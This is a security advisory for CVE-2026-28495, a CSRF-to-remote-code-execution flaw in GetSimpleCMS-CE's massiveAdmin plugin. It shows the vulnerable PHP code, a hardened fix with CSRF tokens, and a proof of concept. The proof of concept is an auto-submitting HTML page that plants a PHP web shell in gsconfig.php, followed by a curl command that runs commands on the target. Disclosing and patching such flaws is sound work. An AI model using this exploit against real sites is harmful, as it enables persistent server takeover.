
CVE-2026-28495: GetSimpleCMS-CE CSRF to Remote Code Execution

2026-03-05 | Vulnerability Discovery | 3 min read
CVSS 9.7 (Critical)
Tags: CVE, CSRF, RCE, GetSimpleCMS-CE, PHP
Estimated Impact: 100+ customers
TL;DR:
A CSRF vulnerability in the massiveAdmin plugin for GetSimpleCMS-CE allows an unauthenticated attacker to achieve RCE by overwriting gsconfig.php.

Summary

The massiveAdmin plugin (v6.0.3) bundled with GetSimpleCMS-CE v3.3.22 allows an authenticated administrator to overwrite the gsconfig.php configuration file with arbitrary PHP code via the gsconfig editor module. Due to a lack of CSRF protection, a remote unauthenticated attacker can exploit this via Cross-Site Request Forgery against a logged-in administrator, achieving Remote Code Execution (RCE) on the web server.

CVE ID: CVE-2026-28495
Advisory: GHSA-92wv-q2jp-qg88
Affected Versions: GetSimpleCMS-CE ≤ 3.3.22 (with massiveAdmin v6.0.3)

Vulnerability Details

The vulnerability exists in the gsConfigEdit() method of the massiveAdmin plugin class. The method writes raw POST data directly to the core configuration file.

Vulnerable Sink

In plugins/massiveAdmin/class/massiveAdmin.class.php, lines 696–698:

public function gsConfigEdit(){
    file_put_contents(GSROOTPATH . 'gsconfig.php', $_POST['content']);
}

The method writes the raw $_POST['content'] value directly to gsconfig.php with no input validation, no sanitization, and no CSRF token verification.

Trigger Point

In plugins/massiveAdmin/modules/gsconfig.php, lines 25 and 89–95:

<form action="#" method="Post">
    <textarea name="content" id="myTextarea" wrap='off'><?php echo file_get_contents(GSROOTPATH . 'gsconfig.php'); ?></textarea>
    ...
</form>

<?php
if (isset($_POST['editGSConfig'])) {
    global $MA;
    $MA->gsConfigEdit();
    ...
}

The form lacks any nonce or CSRF token. The POST handler triggers immediately when editGSConfig is present in the request.
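A hardened replacement for the sink and the form above, added here as an example and not code from the massiveAdmin plugin or GetSimpleCMS-CE: the write is bound to a per-session CSRF token plus a same-origin check, and the previous file is kept for rollback. It assumes session_start() has already run and that GSROOTPATH is defined by the core, as in the original sink; all function names are hypothetical.

```php
<?php
// Added example, not the plugin's or GetSimpleCMS-CE's own code: a hardened
// replacement for gsConfigEdit() that binds the write to a per-session CSRF
// token and to a same-origin request. Assumes session_start() has run and
// GSROOTPATH is defined by the core, as in the original sink.

// Token generated once per session and embedded in the editor form.
function gsconfig_csrf_token(): string {
    if (empty($_SESSION['gsconfig_csrf'])) {
        $_SESSION['gsconfig_csrf'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['gsconfig_csrf'];
}

// Hidden field to add to the <form> in modules/gsconfig.php.
function gsconfig_token_field(): string {
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(gsconfig_csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// Constant-time comparison; an absent or empty token never validates.
function gsconfig_csrf_valid($submitted): bool {
    $expected = $_SESSION['gsconfig_csrf'] ?? '';
    return is_string($submitted) && $expected !== '' && hash_equals($expected, $submitted);
}

// Cross-site form posts carry a foreign Origin (or Referer); a missing or
// non-matching host is treated as cross-site. Defence in depth, not a token substitute.
function gsconfig_same_origin(array $server, string $siteHost): bool {
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $host = parse_url($source, PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $siteHost) === 0;
}

// Drop-in for gsConfigEdit(): returns true only when the file was rewritten.
function gsConfigEditHardened(array $post, array $server, string $siteHost): bool {
    if (!gsconfig_csrf_valid($post['csrf_token'] ?? null)) {
        return false;                // forged or missing token: write nothing
    }
    if (!gsconfig_same_origin($server, $siteHost)) {
        return false;
    }
    $content = (string)($post['content'] ?? '');
    if (trim($content) === '') {
        return false;                // an empty gsconfig.php would break every request
    }
    $target = GSROOTPATH . 'gsconfig.php';
    copy($target, $target . '.bak'); // keep a rollback copy of the previous config
    return file_put_contents($target, $content, LOCK_EX) !== false;
}
```

In the handler, the `$MA->gsConfigEdit()` call would become `gsConfigEditHardened($_POST, $_SERVER, $_SERVER['HTTP_HOST'])`, and the form would echo `gsconfig_token_field()` next to the textarea. Setting the session cookie with SameSite=Lax adds a further browser-side layer against cross-site POSTs.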

Code Execution Path

The gsconfig.php file is a critical configuration file loaded on every single request to the application, making the injection persistent and highly impactful.

  • Frontend: index.php, line 23: require_once('gsconfig.php');
  • Backend: admin/inc/common.php, line 82: require_once(GSROOTPATH . 'gsconfig.php');

Proof of Concept

An attacker can host the following HTML page and lure an authenticated GetSimpleCMS-CE administrator to visit it. The script will automatically submit the form, injecting a web shell into the server configuration.

<html>
  <body>
    <h1>Loading...</h1>
    <form id="exploit" method="POST" action="https://TARGET/admin/load.php?id=massiveAdmin&massiveoption">
      <input type="hidden" name="content" value="<?php system($_GET['cmd']); ?>" />
      <input type="hidden" name="editGSConfig" value="1" />
    </form>
    <script>
      document.getElementById('exploit').submit();
    </script>
  </body>
</html>

Once the admin's browser submits the form:

  1. load.php passes the authentication check.
  2. The massiveAdmin plugin processes the POST request.
  3. gsConfigEdit() writes <?php system($_GET['cmd']); ?> to GSROOTPATH/gsconfig.php.

The attacker can then achieve RCE:

curl "https://TARGET/?cmd=id"
# Returns: uid=33(www-data) gid=33(www-data) ...

Impact

  • Remote Code Execution: Ability to execute arbitrary system commands with web server privileges.
  • Full Server Compromise: Access to read/write arbitrary files, pivot to internal networks, and exfiltrate data.
  • Persistent Backdoor: The injected code executes on every page load since gsconfig.php is required globally.
  • Zero Interaction Required: The payload auto-submits once the victim visits the malicious page.

References